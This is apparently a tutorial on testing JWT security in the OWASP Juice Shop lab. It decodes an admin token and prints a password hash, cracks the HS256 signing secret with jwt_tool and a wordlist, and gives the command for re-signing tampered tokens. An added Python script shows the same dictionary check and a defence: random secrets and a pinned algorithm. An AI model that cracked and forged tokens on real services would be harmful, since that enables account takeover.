On jwt.io you can create a JWT, or paste an existing JWT to decode and inspect it.
jwt_tool is written in Python; from the command line it can crack the secret key of an HMAC-signed token, recovering the key needed to mint new tokens.
For this exercise, the OWASP Juice Shop JWT is re-issued with its algorithm changed from RS256 to HS256.
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.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.BU-SSMhRN5_tei_3bgkjxJDoXQNRN6jLyDVm2WtWKhk
Download the tool from https://github.com/ticarpi/jwt_tool and decode the token above; the result looks like this.
(Python and a few extra modules must be installed first.)
% python3 jwt_tool.py eyJ~~~~~
Original JWT:
=====================
Decoded Token Values:
=====================
Token header values:
[+] typ = "JWT"
[+] alg = "HS256"
Token payload values:
[+] status = "success"
[+] data = JSON object:
[+] id = 1
[+] username = ""
[+] email = "admin@juice-sh.op"
[+] password = "0192023a7bbd73250516f069df18b500"
[+] role = "admin"
[+] deluxeToken = ""
[+] lastLoginIp = ""
[+] profileImage = "assets/public/images/uploads/defaultAdmin.png"
[+] totpSecret = ""
[+] isActive = True
[+] createdAt = "2024-03-10 08:25:20.576 +00:00"
[+] updatedAt = "2024-03-10 08:25:20.576 +00:00"
[+] deletedAt = "None"
[+] iat = 1710059780 ==> TIMESTAMP = 2024-03-10 17:36:20 (UTC)
----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------
To recover the arbitrarily chosen signing key from a wordlist, create a small dictionary file and run the cracking mode against it.
[crapi.txt]
crapi
crrrr
abdsfd
python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.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.BU-SSMhRN5_tei_3bgkjxJDoXQNRN6jLyDVm2WtWKhk -C -d crapi.txt
Original JWT:
[+] crapi is the CORRECT key!
You can tamper/fuzz the token contents (-T/-I) and sign it using:
python3 jwt_tool.py [options here] -S hs256 -p "crapi
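The two steps above (decode the token without verifying it, then test each wordlist entry as the HMAC secret) are what jwt_tool does under the hood. The script below is an added example, not code from the post or from jwt_tool: it builds a constructed HS256 token signed with the weak secret "crapi" and the same three-word wordlist, shows the decode-only view that jwt.io gives, recovers the weak secret, and then shows that a token signed with a long random secret (secrets.token_urlsafe) is not found by the same check. The header and payload values are constructed to resemble the decoded Juice Shop token; WORDLIST, sign_hs256, decode_jwt and audit_secret are names chosen here.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import List, Optional, Tuple


def b64url_encode(data: bytes) -> str:
    """Base64url without '=' padding, as RFC 7515 requires for JWS segments."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Base64url decode, restoring the padding the compact JWS format strips."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(header: dict, payload: dict, secret: str) -> str:
    """Produce a compact JWS (header.payload.signature) signed with HMAC-SHA256."""
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    mac = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(mac)}"


def decode_jwt(token: str) -> Tuple[dict, dict]:
    """Decode header and payload WITHOUT verifying the signature (the jwt.io view)."""
    header_b64, payload_b64, _sig_b64 = token.split(".")
    return (
        json.loads(b64url_decode(header_b64)),
        json.loads(b64url_decode(payload_b64)),
    )


def audit_secret(token: str, wordlist: List[str]) -> Optional[str]:
    """Return the wordlist entry that reproduces the token's signature, or None.

    This is the check behind `jwt_tool -C -d wordlist`: for every candidate,
    recompute HMAC-SHA256 over 'header.payload' and compare it with the
    signature carried in the token. Only HS256 tokens are in scope; an RS256
    token has no shared secret to recover.
    """
    header, _payload = decode_jwt(token)
    if header.get("alg") != "HS256":
        return None
    signing_input, _, sig_b64 = token.rpartition(".")
    sig = b64url_decode(sig_b64)
    for candidate in wordlist:
        mac = hmac.new(candidate.encode(), signing_input.encode(), hashlib.sha256).digest()
        if hmac.compare_digest(mac, sig):  # constant-time comparison
            return candidate
    return None


# Constructed sample data: same shape as the decoded Juice Shop token in the post.
HEADER = {"typ": "JWT", "alg": "HS256"}
PAYLOAD = {
    "status": "success",
    "data": {"id": 1, "email": "admin@juice-sh.op", "role": "admin"},
    "iat": 1710059780,
}
WORDLIST = ["crapi", "crrrr", "abdsfd"]  # contents of crapi.txt above

# Weak setting: a dictionary word as the HMAC secret.
WEAK_TOKEN = sign_hs256(HEADER, PAYLOAD, "crapi")

# Corrected setting: 32 random bytes from the OS CSPRNG, never a dictionary word.
STRONG_SECRET = secrets.token_urlsafe(32)
STRONG_TOKEN = sign_hs256(HEADER, PAYLOAD, STRONG_SECRET)

if __name__ == "__main__":
    hdr, body = decode_jwt(WEAK_TOKEN)
    print("alg:", hdr["alg"], "| role:", body["data"]["role"])
    print("weak token secret found:", audit_secret(WEAK_TOKEN, WORDLIST))
    print("strong token secret found:", audit_secret(STRONG_TOKEN, WORDLIST))
```

Running the script prints the decoded algorithm and role, then "crapi" for the weak token and None for the strong one. The point for the defender is the last line: a secret that is long, random and not derived from any word defeats dictionary cracking entirely, and the verifying server should also pin the algorithm it accepts rather than trusting the token's own alg header.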
The first time jwt_tool runs it reports that no config file existed and that one has been created.
Simply run the command once more.
No config file yet created.
Running config setup.
Configuration file built - review contents of "jwtconf.ini" to customise your options.
Make sure to set the "httplistener" value to a URL you can monitor to enable out-of-band checks.